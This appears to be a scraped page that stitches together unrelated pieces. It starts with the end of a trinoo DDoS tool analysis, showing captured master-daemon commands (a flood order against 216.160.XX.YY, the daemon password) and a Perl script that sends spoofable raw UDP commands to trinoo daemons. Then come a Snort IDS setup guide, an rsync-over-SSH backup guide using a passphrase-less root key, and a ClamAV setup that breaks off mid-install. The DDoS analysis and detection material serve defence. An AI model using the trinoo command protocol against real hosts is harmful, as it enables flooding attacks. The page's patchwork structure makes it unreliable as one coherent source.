### 10.0.0.1:27665 [AP]
  62 63 61 73 74 0d 0a                                  bcast..
# 192.168.100.1:1074 [AP]
  4c 69 73 74 69 6e 67 20 42 63 61 73 74 73 2e 0a       Listing Bcasts..
  0a                                                    .
### 192.168.100.1:1074 [AP]
  31 39 32 2e 31 36 38 2e 30 2e 31 2e 20 20 20 0a       192.168.0.1.   .
  0a 45 6e 64 2e 20 31 20 42 63 61 73 74 73 20 74       .End. 1 Bcasts t
## 10.0.0.1:27665 [AP]
  6d 74 69 6d 65 72 20 31 30 30 30 0d 0a                mtimer 1000..
## 192.168.100.1:1074 [AP]
  6d 74 69 6d 65 72 3a 20 53 65 74 74 69 6e 67 20       mtimer: Setting 
  74 69 6d 65 72 20 6f 6e 20 62 63 61 73 74 20 74       timer on bcast t
  6f 20 31 30 30 30 2e 0a                               o 1000..
# 192.168.0.1:27444
  62 62 62 20 6c 34 34 61 64 73 6c 20 31 30 30 30       bbb l44adsl 1000
## 192.168.100.1:1074 [AP]
  6d 74 69 6d 65 72 3a 20 53 65 74 74 69 6e 67 20       mtimer: Setting 
  74 69 6d 65 72 20 6f 6e 20 62 63 61 73 74 20 74       timer on bcast t
  6f 20 31 30 30 30 2e 0a                               o 1000..
### 192.168.100.1:1074 [AP]
### 10.0.0.1:27665 [AP]
  6d 73 69 7a 65 20 33 32 30 30 30 0d 0a                msize 32000..
# 192.168.0.1:27444
  72 73 7a 20 33 32 30 30 30                            rsz 32000
# 192.168.100.1:1074 [AP]
### 10.0.0.1:27665 [AP]
  64 6f 73 20 32 31 36 2e 31 36 30 2e 58 58 2e 59       dos 216.160.XX.Y
  59 0d 0a                                              Y..
# 192.168.100.1:1074 [AP]
  44 6f 53 3a 20 50 61 63 6b 65 74 69 6e 67 20 32       DoS: Packeting 2
  31 36 2e 31 36 30 2e 58 58 2e 59 59 2e 0a             16.160.XX.YY..
# 192.168.0.1:27444
  61 61 61 20 6c 34 34 61 64 73 6c 20 32 31 36 2e       aaa l44adsl 216.
  31 36 30 2e 58 58 2e 59 59                            160.XX.YY
# 192.168.100.1:1074 [AP]
## 10.0.0.1:27665 [AP]
  71 75 69 74 0d 0a                                     quit..
# 192.168.100.1:1074 [AP]
  62 79 65 20 62 79 65 2e 0a                            bye bye..
### 10.0.0.1:27665 [AP]
  62 65 74 61 61 6c 6d 6f 73 74 64 6f 6e 65 0d 0a       betaalmostdone..
## 192.168.100.1:1075 [AP]
  74 72 69 6e 6f 6f 20 76 31 2e 30 37 64 32 2b 66       trinoo v1.07d2+f
  33 2b 63 2e 2e 5b 72 70 6d 38 64 2f 63 62 34 53       3+c..[rpm8d/cb4S
  78 2f 5d 0a 0a 0a                                     x/]...
### 192.168.100.1:1075 [AP]
### 10.0.0.1:27665 [AP]
  6d 70 69 6e 67 0d 0a                                  mping..
## 192.168.100.1:1075 [AP]
  6d 70 69 6e 67 3a 20 53 65 6e 64 69 6e 67 20 61       mping: Sending a
  20 50 49 4e 47 20 74 6f 20 65 76 65 72 79 20 42        PING to every B
  63 61 73 74 73 2e 0a                                  casts..
# 192.168.0.1:27444
  70 6e 67 20 6c 34 34 61 64 73 6c                      png l44adsl
## 10.0.0.1:31335
  50 4f 4e 47                                           PONG
## 192.168.100.1:1075 [AP]
  50 4f 4e 47 20 31 20 52                               PONG 1 R
  65 63 65 69 76 65 64 20 66 72 6f 6d 20 31 39 32       eceived from 192
  2e 31 36 38 2e 30 2e 31 0a                            .168.0.1.
## 10.0.0.1:27665 [AP]
  71 75 69 74 0d 0a                                     quit..
# 192.168.100.1:1075 [AP]
  62 79 65 20 62 79 65 2e 0a                            bye bye..


Appendix B: trinot script


------------------------------- cut here -----------------------------------
#!/usr/bin/perl -w
#
# trinot v. 1.1
# By Dave Dittrich
#
# Send commands to trinoo daemon(s), causing them to PONG, *HELLO*
# to all their masters, exit, etc. Using this program (and knowledge
# of the proper daemon password), you can affect trinoo daemons
# externally and monitor packets to verify if the daemons are up,
# expose their masters, or shut them down.
#
# Needs Net::RawIP (http://quake.skif.net/RawIP)
# Requires libpcap (ftp://ftp.ee.lbl.gov/libpcap.tar.Z)
#
# Example: ./trinot host1 [host2 [...]]
#          ./trinot -S host
#          ./trinot -p password -P host
#
# (This code was hacked from the "macof" program, written by
# Ian Vitek)

use Getopt::Std;          # replaces the old 'getopts.pl' library
use Net::RawIP;
use vars qw($opt_P $opt_S $opt_D $opt_p $opt_f $opt_s $opt_d
            $opt_l $opt_i $opt_e $opt_v $opt_h);

# one raw UDP packet object, reused for every target host
$pkt = Net::RawIP->new({udp => {}});
chop($hostname = `hostname`);

getopts('PSDp:f:s:d:l:i:e:vh');
die "usage: $0 [options] host1 [host2 [...]]
\t-P\t\t\tSend \"png\" command
\t-S\t\t\tSend \"shi\" command
\t-D\t\t\tSend \"d1e\" command (default)
\t-p password\t\t(default: \"l44adsl\")
\t-f from_host\t\t(default: $hostname)
\t-s src_port\t\t(default: random)
\t-d dest_port\t\t(default: 27444)
\t-l ipfile\t\tSend to IP addresses in ipfile
\t-i interface\t\tSet sending interface (default: eth0)
\t-e dest_mac\t\tSet destination MAC address (optional)
\t-v\t\t\tVerbose
\t-h\t\t\tThis help\n" if $opt_h;

# set default values
$opt_i  = ($opt_i) ? $opt_i : "eth0";
$s_port = ($opt_s) ? $opt_s : int rand 65535;
$d_port = ($opt_d) ? $opt_d : 27444;
$pass   = ($opt_p) ? $opt_p : "l44adsl";

# choose network card (and, optionally, a fixed destination MAC)
if ($opt_e) {
    $pkt->ethnew($opt_i, dest => $opt_e);
} else {
    $pkt->ethnew($opt_i);
}

# daemon command to send: png (PONG back), shi (*HELLO* to masters), d1e (exit)
$cmd = ($opt_P) ? "png $pass" :
       ($opt_S) ? "shi $pass" :
       ($opt_D) ? "d1e $pass" :
                  "d1e $pass";

$s_host = ($opt_f) ? $opt_f : $hostname;

# -l: read additional target addresses from a file, one per line
if ($opt_l) {
    open(I, "<$opt_l") || die "could not open file: '$opt_l'";
    while (<I>) {
        chop;
        push(@ARGV, $_);
    }
    close(I);
}

foreach $d_host (@ARGV) {
    $pkt->set({ip  => {saddr => $s_host, daddr => $d_host},
               udp => {source => $s_port, dest => $d_port, data => $cmd}});
    print "sending '$cmd' to $d_host\n" if $opt_v;
    $pkt->send;
}
exit(0);


  ------------------------------- cut here -----------------------------------

  Appendix C - References

  TCP/IP Illustrated, Vol. I, II, and III. W. Richard Stevens and Gary R. Wright, Addison-Wesley.

  lsof: ftp://vic.cc.purdue.edu/pub/tools/unix/lsof/

  tcpdump: ftp://ftp.ee.lbl.gov/tcpdump.tar.Z



Snort intrusion prevention Linux installation and configuration

An Intrusion Detection System (IDS) identifies and responds to malicious use of computer and network resources. Like a radar early-warning system, it gathers information from a number of key points in the computer network without affecting network performance, and analyses that information for violations of the network security policy and for signs of attack. This extends the system administrator's security management capability and improves the security and integrity of the information infrastructure. An IDS is generally deployed as a complement to a firewall, usually behind it, where it can detect network activity in real time and, depending on the circumstances, record or block that activity.

Depending on where they focus their work, intrusion detection systems are divided into host-based and network-based systems. An IDS generally consists of two parts: a detection component (the Sensor) and a console that handles alerts and results. The composition differs from product to product, but console and Sensor are the two basic parts; host-based systems usually install an agent on each monitored host to collect information and report it to the Sensor. The Sensor receives the information the IDS detects on from its own information sources.

A network-based IDS works mainly by intercepting and analysing network packets to find packets with attack characteristics or undesirable attempts. Its Sensor is generally attached to a mirror port of a switch (or to any port of an ordinary hub), listens to all packets flowing through the network, and looks in them for matches against intrusion signatures.

A host-based IDS Sensor cannot obtain information from the system directly; it relies on agent programs installed beforehand on the hosts that need to be monitored. These agents mainly collect system and network log files, unexpected changes to directories and files, unexpected program executions, and physical signs of intrusion.

The Sensor of a network-based IDS is generally placed on the network's core switch or on the mirror port of a switch (whether it goes on the core switch or on a mirror port of a departmental switch depends mainly on the traffic volume, the number of clients, the processing capability of the IDS, and the expected frequency of attacks). The console is installed on a machine in the network to handle alerts, or on a server; on important hosts a client agent is installed to gather system and network logs and other system information in which attack characteristics can be found. Technical staff then analyse the detection and monitoring information from both hosts and network.

Snort is one of the most widely used IDS products. It is positioned as a lightweight intrusion detection system with the following characteristics:
(1) It is a lightweight network intrusion detection system: "lightweight" means that the running software consumes very few network resources and has little effect on the network's original performance.
(2) In terms of data source it is a network-based IDS: it acts as a sniffer on one host, capturing the traffic of the other hosts on the same network and then analysing it.
(3) It uses the misuse-detection model: a library of intrusion signatures is established first, and during detection the collected packets are compared against the signature code to decide whether an intrusion has occurred.
(4) It is an open-source network intrusion detection system written in the C language. Its source code can be freely read, distributed and modified; any programmer can add features, fix errors and redistribute it, which lets it improve quickly and spread widely.
(5) It is cross-platform software supporting a very wide range of operating systems, such as Windows, Linux and SunOS. Installation on Windows is relatively simple: first download the Windows packet capture tool WinPcap (www.winpcap.org), then download the Snort installer and double-click it to install.
(6) Snort has three main modes: packet sniffer, packet logger, and a full intrusion detection system.
Some of Snort's features:
- Real-time traffic analysis and packet logging.
- Packet payload inspection.
- Protocol analysis and content matching.
- Detection of buffer overflows, stealth port scans, CGI attacks, SMB probes, OS fingerprinting and other intrusion attempts.
- Logging to syslog, a specified file, a Unix socket, or real-time WinPopup alerts through Samba.

Snort can work in the following three modes:
1) Sniffer mode
Command: snort -v [-d] [-X]

Snort uses the libpcap packet capture library, the same library tcpdump uses. In this mode Snort puts the network interface into promiscuous mode and reads and parses the packets on the shared channel. BPF expressions can be used to filter the traffic.
-v verbose
-d dump application-layer data
-X dump the raw packet starting from the link layer
2) Packet logger mode
Command: snort -l dir [-h hn] [-b]
This mode records packets in ASCII format for later analysis.
-l directory  snort writes its logs into this directory
-h X.X.X.X  set the local (home) subnet
-b  log in binary tcpdump format
3) Intrusion detection mode
Command: snort -c snort.conf [-l dir]
In intrusion detection mode the rule base is loaded, that is:
# ./snort -c snort.conf
Snort writes its alert information to the /var/log/snort directory by default; the -l option changes the directory.

To use intrusion detection mode the rule base must be loaded; after loading it, Snort matches network data against the rule patterns in order to detect possible intrusion attempts.

This article covers installing and configuring Snort on the Linux platform (here Red Hat 9.0), and finally configuring the ACID web console for analysing Snort's intrusion database. Under Linux a range of supporting software must be built before Snort can be used. Table 1 lists the software and their roles.
Table 1: software needed to install Snort

Name      Download site                    Role
Apache    http://httpd.apache.org/         Apache web server under Linux
PHP       http://php.net/                  PHP scripting support
MySQL     http://www.mysql.cn/             Database support
libpcap   http://www.tcpdump.org/          Network packet capture library
Snort     http://www.snort.org             Snort installation package
ACID      http://www.cert.org/kb/acid      PHP-based analysis console for the intrusion detection database
ADOdb     http://adodb.sourceforge.net     Unified database connection functions for PHP
JpGraph   http://www.aditus.nu/jpgraph     PHP graphics library used by ACID


1. zlib 1.1.4 installation
tar -xzvf zlib-xx.tar.gz
cd zlib-xx
./configure
make install
cd ..
2. libpcap 0.7.2 installation
tar -xzvf libpcap.tar.gz
cd libpcap-xx
./configure
make
make install
cd ..
3. MySQL 4.0.12 installation
tar -xzvf mysql-xx.tar.gz
cd mysql-xx
./configure --prefix=/usr/local/mysql
make
make install
cd scripts
./mysql_install_db
chown -R root /usr/local/mysql
chown -R mysql /usr/local/mysql/var
chgrp -R mysql /usr/local/mysql
cp ../support-files/my-medium.cnf /etc/my.cnf
Add two lines to /etc/ld.so.conf:
/usr/local/mysql/lib/mysql
/usr/local/lib
Then load the libraries by running
ldconfig -v
Test whether MySQL works:



4. Apache 2.0.45 and PHP 4.3.1 installation
tar -zxvf httpd-2.0.xx.tar.gz
cd httpd-2.0.xx
./configure --prefix=/www --enable-so
make
make install
cd ..
tar -zxvf php-4.3.x.tar.gz
cd php-4.3.x
./configure --prefix=/www/php --with-apxs2=/www/bin/apxs --with-config-file-path=/www/php --enable-sockets --with-mysql=/usr/local/mysql --with-zlib-dir=/usr/local --with-gd
make
make install
cp php.ini-dist /www/php/php.ini
Edit httpd.conf (in /www/conf) and add the two lines
LoadModule php4_module modules/libphp4.so
AddType application/x-httpd-php .php
so that the relevant part of httpd.conf reads:
#
# LoadModule foo_module modules/mod_foo.so
LoadModule php4_module modules/libphp4.so
# AddType allows you to tweak mime.types without actually editing it, or to
# make certain files to be certain types.
#
AddType application/x-tar .tgz
AddType image/x-icon .ico
AddType application/x-httpd-php .php
To test Apache and PHP:




5. Snort 2.0 installation
5.1 Create the Snort configuration and log directories
mkdir /etc/snort
mkdir /var/log/snort
tar -zxvf snort-2.x.x.tar.gz
cd snort-2.x.x
./configure --with-mysql=/usr/local/mysql
make
make install
5.2 Install the rules and configuration files
cd rules   (in the Snort source directory)
cp * /etc/snort
cd ../etc
cp snort.conf /etc/snort
cp *.config /etc/snort
5.3 Modify snort.conf (/etc/snort/snort.conf)
var HOME_NET 10.2.2.0/24
Change var RULE_PATH ../rules to var RULE_PATH /etc/snort/
Change the database log output to:
output database: log, mysql, user=root password=your_password dbname=snort host=localhost
5.4 Set Snort to start automatically:
In the Snort source directory:
cd ./contrib
cp S99snort /etc/init.d/snort
vi /etc/init.d/snort
and modify the script as follows:
CONFIG=/etc/snort/snort.conf
# SNORT_GID=nogroup   (commented out)
$SNORT_PATH/snort -c $CONFIG -i $IFACE $OPTIONS
chmod 755 /etc/init.d/snort
cd /etc/rc3.d
ln -s /etc/init.d/snort S99snort
ln -s /etc/init.d/snort K99snort
cd /etc/rc5.d
ln -s /etc/init.d/snort S99snort
ln -s /etc/init.d/snort K99snort
6. Create the snort database in MySQL; the result is as follows:



7. ADOdb installation
cp adodb330.tgz /www/htdocs/
cd /www/htdocs
tar -xzvf adodb330.tgz
rm -rf adodb330.tgz
8. JpGraph installation
cp jpgraph-1.11.tar.gz /www/htdocs
cd /www/htdocs
tar -xzvf jpgraph-1.xx.tar.gz
rm -rf jpgraph-1.xx.tar.gz
cd jpgraph-1.11
rm -rf README
rm -rf QPL.txt
9. ACID analysis console installation and configuration
cp acid-0.9.6b23.tar.gz /www/htdocs
cd /www/htdocs
tar -xvzf acid-0.9.6b23.tar.gz
rm -rf acid-0.9.6b23.tar.gz
cd /www/htdocs/acid/
Edit acid_conf.php and change the relevant settings as follows:
$DBlib_path = "/www/htdocs/adodb";
$alert_dbname = "snort";
$alert_host = "localhost";
$alert_port = "";
$alert_user = "root";
$alert_password = "Your_Password";
/* Archive DB connection parameters */
$archive_dbname = "snort";
$archive_host = "localhost";
$archive_port = "";
$archive_user = "root";
$archive_password = "Your_Password";
And a little further down:
$ChartLib_path = "/www/htdocs/jpgraph-1.11/src";
/* File format of charts ('png', 'jpeg', 'gif') */
$chart_file_format = "png";
Open the web interface:
http://yourhost/acid/acid_main.php



Click the "Setup Page" link -> Create Acid AG.
Then visit http://yourhost/acid to see the ACID interface.




Snort Rules

Snort's rule base is updated constantly; the latest rule base can be downloaded from www.snort.org. Snort uses a simple, lightweight rule description language to describe its rules and configuration information; it is flexible and powerful. Before version 1.8 a Snort rule had to be written on a single line; in current versions a '\' can be used to continue a rule on the next line.

A Snort rule is divided into two logical parts: the rule header and the rule options. The rule header contains the rule action, the protocol, the source and destination IP addresses with their netmasks, and the source and destination port information; the rule options section contains the alert message and the specific parts of the packet to inspect. The following is an example of a rule:
alert tcp any any -> 192.168.1.0/24 111 (content:"|00 01 86 a5|"; msg:"mountd access";)

The part before the parentheses is the rule header; the part inside the parentheses is the rule options. In the options section, the word before each colon is called an option keyword. Note that not all rules need options; options only serve to define more precisely the packets to be collected, alerted on, or discarded. All elements that make up a rule must be true for the specified action to be taken; when several elements are combined they form a logical AND. At the same time, the different rules in a Snort rules file together form one large logical OR.

The following rule comes from mysql.rules in the Community-Rules-2.4 set downloaded from the official website http://www.snort.org. One of its rules reads:
alert tcp $EXTERNAL_NET any -> $SQL_SERVERS 3306 (msg:"MYSQL root login attempt"; flow:to_server,established; content:"|0A 00 00 01 85 04 00 00 80|root|00|"; classtype:protocol-command-decode; sid:1775; rev:2;)

It says: for traffic from the external network, from any port, to a MySQL server on port 3306, if the data stream matches the content 0A 00 00 01 85 04 00 00 80 root 00 (the parts between the bars are two-digit hexadecimal byte values), then log it and raise the alert "MYSQL root login attempt".

From this analysis of Snort rules we can see that, apart from the IP addresses and port numbers, the most important thing in a rule is the content pattern match, that is, the content keyword. To detect a submitted exploit or tool on the network in Snort's format, we must find the characteristic field of the attack code.
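To make the header/option split and the content keyword concrete, here is an added example in Python (not code from the article or from the Snort project): it parses the two rules quoted above, decodes the |hex| content notation, and matches the MySQL rule's content against a constructed client login packet whose layout follows the bytes in that rule.

```python
"""Snort rule header/option parser and content matcher.

Added example, not code from the original article or from the Snort project:
it parses the two rules quoted above (the mountd rule and the MySQL root-login
rule), decodes Snort's |hex| content notation, and matches a rule's content
patterns against a constructed packet payload.  Only the keywords those rules
use are handled; address, port and flow checks are left out on purpose.
"""
import re
from dataclasses import dataclass, field

# header:  action proto src sport -> dst dport (options)
HEADER_RE = re.compile(
    r'^\s*(?P<action>\w+)\s+(?P<proto>\w+)\s+(?P<src>\S+)\s+(?P<sport>\S+)\s+'
    r'(?P<dir>->|<>)\s+(?P<dst>\S+)\s+(?P<dport>\S+)\s*\((?P<opts>.*)\)\s*$',
    re.S)
# options:  keyword:value;   where value may be a double-quoted string
OPTION_RE = re.compile(r'(\w+)\s*:\s*("(?:[^"\\]|\\.)*"|[^;]*)\s*;')

# the two rules quoted in the text, each written on one line
MOUNTD_RULE = ('alert tcp any any -> 192.168.1.0/24 111 '
               '(content:"|00 01 86 a5|"; msg:"mountd access";)')
MYSQL_RULE = ('alert tcp $EXTERNAL_NET any -> $SQL_SERVERS 3306 '
              '(msg:"MYSQL root login attempt"; flow:to_server,established; '
              'content:"|0A 00 00 01 85 04 00 00 80|root|00|"; '
              'classtype:protocol-command-decode; sid:1775; rev:2;)')


@dataclass
class Rule:
    action: str
    proto: str
    src: str
    sport: str
    direction: str
    dst: str
    dport: str
    options: dict = field(default_factory=dict)   # msg, sid, flow, ...
    contents: list = field(default_factory=list)  # decoded content patterns


def decode_content(text):
    """Turn a content value such as |0A 00|root|00| into bytes: segments
    between bars are space-separated hex bytes, everything else is literal."""
    out = bytearray()
    for i, segment in enumerate(text.split('|')):
        if i % 2:                       # odd segments lie inside |...|
            out += bytes.fromhex(segment)
        else:
            out += segment.encode('latin-1')
    return bytes(out)


def parse_rule(rule_text):
    """Split a rule into its header fields and its option keywords."""
    # current Snort versions fold long rules with a trailing backslash
    joined = re.sub(r'\\\s*\n\s*', ' ', rule_text)
    m = HEADER_RE.match(joined)
    if not m:
        raise ValueError('not a Snort rule: %r' % rule_text)
    rule = Rule(m['action'], m['proto'], m['src'], m['sport'],
                m['dir'], m['dst'], m['dport'])
    for key, value in OPTION_RE.findall(m['opts']):
        value = value.strip()
        if len(value) >= 2 and value[0] == value[-1] == '"':
            value = value[1:-1]
        if key == 'content':
            rule.contents.append(decode_content(value))
        else:
            rule.options[key] = value
    return rule


def matches(rule, payload):
    """Every content pattern must occur in the payload (the logical AND the
    article describes); a rule with no content matches any payload."""
    return all(pattern in payload for pattern in rule.contents)


def alert_for(rule, payload):
    """The rule's msg text if the payload triggers it, otherwise None."""
    return rule.options.get('msg') if matches(rule, payload) else None


def old_mysql_login(user):
    """Constructed pre-4.1 MySQL client login packet: 3-byte little-endian
    length, 1-byte sequence number, 2-byte capability flags, 3-byte maximum
    packet size, then the NUL-terminated user name.  Flag and size values are
    the ones the rule's content pattern expects."""
    body = b'\x85\x04' + b'\x00\x00\x80' + user + b'\x00'
    return len(body).to_bytes(3, 'little') + b'\x01' + body


if __name__ == '__main__':
    rule = parse_rule(MYSQL_RULE)
    for name in (b'root', b'app'):
        print(name.decode(), '->', alert_for(rule, old_mysql_login(name)))
```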

Besides analysing the characteristics from published information about a rule, we can find the characteristic field by running the attack code, capturing the packets with Ethereal or another sniffer, decoding the packet contents, analysing the characteristic field, and then writing the Snort rule. In the article "Using Snort to detect attacks on MS05-051", the author shows how to write rules to detect the attack code for the MS05-051 vulnerability and the steps involved. As that article shows, the main method is to capture the packets with Ethereal, extract the key points to match, and then write the rule with Snort keywords, so that Snort has a signature for the attack.

This article has described installing and configuring Snort on Linux, the basics of Snort rules, and how to write our own rules in the Snort rule base format; I hope it helps in learning and understanding Snort.



unix linux Rsync + SSH Server automated backup encryption

1. Preface

Since the events of 9/11, off-site redundancy is a term people often mention, but complete discussions of it are rare. Because I had a need for it, I had to study how to do it; here is a little of my personal experience with off-site redundancy.

This is divided into three parts: one-way trusted SSH authorization, rsync, and crontab. Leaving aside transfer speed and the time difference between sites, I believe a backup solution like this should satisfy most people's needs.

II. Preparation

Test systems: Red Hat Linux 7.3 to Red Hat 7.3; the local side needs to have rsync started; package openssh-3.4p1-1.

** Assumption: A (10.0.0.1) does the remote backup of B (192.168.0.1)

PS: the roles above are clear; of course you can also do it the other way round.

Reference site: http://www.fanqiang.com/a6/b7/20010908/1305001258_b.Html

III. Implementation

1. Set up one-way trusted SSH authorization:

I want A (10.0.0.1) to do the remote backup of B (192.168.0.1), so A should be able to SSH to B without entering a password. The user is root, and the SSH protocol version is 2. First, generate a public/private DSA key pair on A (10.0.0.1):

[root@mondeo home]# cd /root/.ssh/
[root@mondeo .ssh]# ssh-keygen -d
Generating public/private dsa key pair.
Enter file in which to save the key (/root/.ssh/id_dsa):
Enter passphrase (empty for no passphrase):   <- enter no passphrase here, so no password is asked for next time
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_dsa.
Your public key has been saved in /root/.ssh/id_dsa.pub.
The key fingerprint is:
11:22:33:44:55:66:77:88:99:00:11:22:33:44:55:66 root@mondeo.adj.idv.tw
[root@mondeo .ssh]#

Now two files exist: id_dsa and id_dsa.pub. Copy id_dsa.pub to 192.168.0.1 and rename it authorized_keys2:

[root@mondeo .ssh]# scp id_dsa.pub 192.168.0.1:/root/.ssh/authorized_keys2
root@192.168.0.1's password:
id_dsa.pub           100% |*****************************|   612       00:00
[root@mondeo .ssh]#

Now run ssh 192.168.0.1 to check that you can log in without entering a password.

2. Use rsync for the remote sync:

About rsync features:

rsync is a data mirroring and backup tool for Unix-like systems; as the name suggests, it does remote sync.

Its characteristics are as follows:

1. It can mirror an entire directory tree and file system.

2. It can easily preserve the original file permissions, timestamps and so on.

3. No special privileges are needed to install it.

4. Its process is optimised, so file transfer is highly efficient.

5. It can transfer files over rcp, ssh and so on, and can of course also use a direct socket connection.

6. It supports anonymous transfers.

First, enable the rsync server on B (192.168.0.1):

[root@linux /]# chkconfig --list rsync
rsync   off
[root@linux /]# chkconfig rsync on

Now I create a backup directory on A (10.0.0.1) and back up the mysql and html directories of B (192.168.0.1) off-site, with a simple script as follows:

[root@mondeo /]# mkdir backup
[root@mondeo backup]# vi sync

rsync -avlR --delete -e ssh 192.168.0.1:/var/lib/mysql /backup/ || echo "rsync failed" | mail adminS@126.com
rsync -avlR --delete -e ssh 192.168.0.1:/var/www/html /backup/ > /dev/null 2>&1

[root@mondeo backup]# chmod 700 sync



The parameters mean the following:

-v: tells rsync to report the details of the operation and explain what it is doing.

-a: tells rsync to copy all files and directories of the source (archive mode).

-l, --links: when symlinks are encountered, recreate the symlink on the destination.

-R, --relative: use relative paths; the relative path is retained, so subdirectories of different parents are not lumped together at the same level.

--delete: if a file has been deleted on the server side, delete the corresponding file on the client side too, so that the two sides stay truly consistent.

-e ssh: run the connection over SSH, so it is encrypted.

Which parameters to use varies from person to person; see man rsync for more of them.

Test it:

[root@mondeo backup]# ./sync
receiving file list ... done
wrote 16 bytes  read 107 bytes  82.00 bytes/sec
total size is 0  speedup is 0.00
receiving file list ... done
wrote 16 bytes  read 921 bytes  624.67 bytes/sec
total size is 308331  speedup is 329.06
[root@mondeo backup]#



It did not ask for a password, and the files were copied over without problems. Of course, you can change the data on the remote side to see whether it really syncs.

3. Use crontab to schedule it automatically:

Now that it is set up, I want it to sync for me every night at 0:00; how often you sync depends on your own needs.

[root@mondeo backup]# crontab -e

0 0 * * * /backup/sync

Set up the firewall:

SSH, port 22:

iptables -A INPUT -i eth0 -p tcp -s 10.1.1.0/24 --sport 1024:65535 -d 192.168.0.1 --dport 22 -j ACCEPT

rsync, port 873:

iptables -A INPUT -i eth0 -p tcp -s 10.1.1.0/24 --sport 1024:65535 -d 192.168.0.1 --dport 873 -j ACCEPT

That is it; in principle you now have an automatic, encrypted remote backup.
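The passphrase-less root key from step 1 lets A run anything on B; an added example (in Python, not part of the original post) of the usual way to narrow that: a forced-command wrapper named in the key's authorized_keys2 entry, which only lets the key pull the two directories the sync script backs up. The wrapper path /usr/local/bin/rsync_only is an assumption, and the argv layout it checks is the rsync --server --sender ... . <path> invocation that the client command in the sync script asks B to run.

```python
#!/usr/bin/env python3
"""Forced-command wrapper restricting the backup key to rsync pulls.

Added example, not part of the original post.  The post gives A a
passphrase-less key into B's root account; this wrapper, installed on B at
the assumed path /usr/local/bin/rsync_only and named in the key's
authorized_keys2 entry as command="...", makes that key good for nothing
but sending the two directories the sync script pulls.  sshd puts the
command the client asked for into SSH_ORIGINAL_COMMAND; the script's
    rsync -avlR --delete -e ssh 192.168.0.1:/var/lib/mysql /backup/
asks B to run   rsync --server --sender <flags> . /var/lib/mysql
"""
import os
import shlex
import sys

# directories the post's sync script pulls from B
ALLOWED_SOURCES = ("/var/lib/mysql", "/var/www/html")
# key options that switch off everything except the forced command
KEY_OPTIONS = "no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty"
# server-side rsync flags that would make rsync modify files on B
DENIED_FLAGS = ("--remove-source-files", "--log-file")


def authorized_keys_line(wrapper_path, pubkey):
    """authorized_keys2 entry that pins pubkey to the wrapper."""
    return 'command="%s",%s %s' % (wrapper_path, KEY_OPTIONS, pubkey)


def allowed_argv(original_command):
    """argv to exec if original_command is an rsync sender for an allowed
    directory, else None.  No shell is involved, so metacharacters in the
    string are inert; the checks concern what rsync itself would do."""
    try:
        argv = shlex.split(original_command)
    except ValueError:              # unbalanced quotes
        return None
    # receiver mode (no --sender) would let A write into B: refuse it
    if argv[:3] != ["rsync", "--server", "--sender"]:
        return None
    if "." not in argv[3:]:
        return None
    dot = argv.index(".", 3)
    flags, sources = argv[3:dot], argv[dot + 1:]
    if not sources:
        return None
    for flag in flags:
        if any(flag == d or flag.startswith(d + "=") for d in DENIED_FLAGS):
            return None
    for src in sources:
        # normpath collapses ../ so /var/lib/mysql/../../../etc is caught
        if os.path.normpath(src) not in ALLOWED_SOURCES:
            return None
    return argv


def main():
    argv = allowed_argv(os.environ.get("SSH_ORIGINAL_COMMAND", ""))
    if argv is None:
        sys.stderr.write("rsync_only: command rejected\n")
        return 1
    os.execvp(argv[0], argv)        # replaces this process with rsync


if __name__ == "__main__":
    sys.exit(main())
```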


CentOS mail server with anti-virus and anti-spam functionality

You may have a working mail server, but with few features and no anti-virus or anti-spam capability. This article mainly adds those features, and adds e-mail traffic monitoring as well!

1. Install the ClamAV anti-virus software:
[root@mail ~]# yum install clamav


Dependencies Resolved
=============================================================================
 Package                 Arch       Version          Repository        Size
=============================================================================
Installing:
 clamav                  i386       0.91.2-1.el4.rf  dag               1.1 M
Installing for dependencies:
 clamav-db               i386       0.91.2-1.el4.rf  dag                10 M

Transaction Summary
=============================================================================
Install      2 Package(s)
Update       0 Package(s)
Remove       0 Package(s)
Total download size: 11 M
Is this ok [y/N]: y
Downloading Packages:
(1/2): clamav-0.91.2-1.el 100% |=========================| 1.1 MB    02:31
(2/2): clamav-db-0.91.2-1 100% |=========================|  10 MB    21:27
Running Transaction Test
Finished Transaction Test
Transaction Test Succeeded
Running Transaction
  Installing: clamav-db                    ######################### [1/2]
  Installing: clamav                       ######################### [2/2]

Installed: clamav.i386 0:0.91.2-1.el4.rf
Dependency Installed: clamav-db.i386 0:0.91.2-1.el4.rf
Complete!


2. Update the anti-virus signature database:
[root@mail ~]# /usr/bin/freshclam
ClamAV update process started at Fri Aug 31 18:55:00 2007
Downloading daily.cvd [100%]
daily.cvd updated (version: 4110, sigs: 16448, f-level: 21, builder: acab)
Database updated (149611 signatures) from db.cn.clamav.net (IP: 58.221.222.69)
WARNING: Clamd was NOT notified: Can't find or parse configuration file /etc/clamd.conf


3. About the warning in the signature update above: because clamav was installed as an RPM package through yum, the generated configuration file is not in the /etc directory and is named clamav.conf. Proceed as follows:
[root@mail etc]# find / -name clam*
find: /proc/801/task: No such file or directory
find: /proc/802/task: No such file or directory
find: /proc/803/task: No such file or directory
find: /proc/928/task: No such file or directory
find: /proc/936/task: No such file or directory
/etc/log.d/conf/services/clamav.conf
[root@mail etc]# cp /etc/log.d/conf/services/clamav.conf /etc/clamd.conf

4. Install the SpamAssassin anti-spam software:
[root@mail ~]# yum -y install spamassassin
Dependencies Resolved
=============================================================================
 Package                 Arch       Version           Repository       Size
=============================================================================
Installing:
 spamassassin            i386       3.2.3-1.el4.rf    dag              1.0 M
Installing for dependencies:
 perl-Archive-Tar        noarch     1.32-1.el4.rf     dag               47 k
 perl-Digest-HMAC        noarch     1.01-13           base              11 k
 perl-Digest-SHA1        i386       2.07-5            base              19 k
 perl-IO-Socket-SSL      noarch     1.07-2.el4.rf     dag               43 k
 perl-IO-Zlib            noarch     1.05-1.el4.rf     dag               15 k
 perl-Net-DNS            i386       0.61-1.el4.rf     dag              271 k
 perl-Net-IP             noarch     1.25-1.el4.rf     dag               30 k
 perl-Net-SSLeay         i386       1.30-4.el4.centos extras           198 k
 perl-Time-HiRes         i386       1.55-3            base              22 k
Updating for dependencies:
 perl-HTML-Parser        i386       3.55-1.el4.rf     dag              140 k

Transaction Summary
=============================================================================
Install     10 Package(s)
Update       1 Package(s)
Remove       0 Package(s)
Total download size: 1.8 M
Downloading Packages:
(1/11): perl-HTML-Parser- 100% |=========================| 140 kB    00:24
(2/11): perl-Digest-HMAC- 100% |=========================|  11 kB    00:05
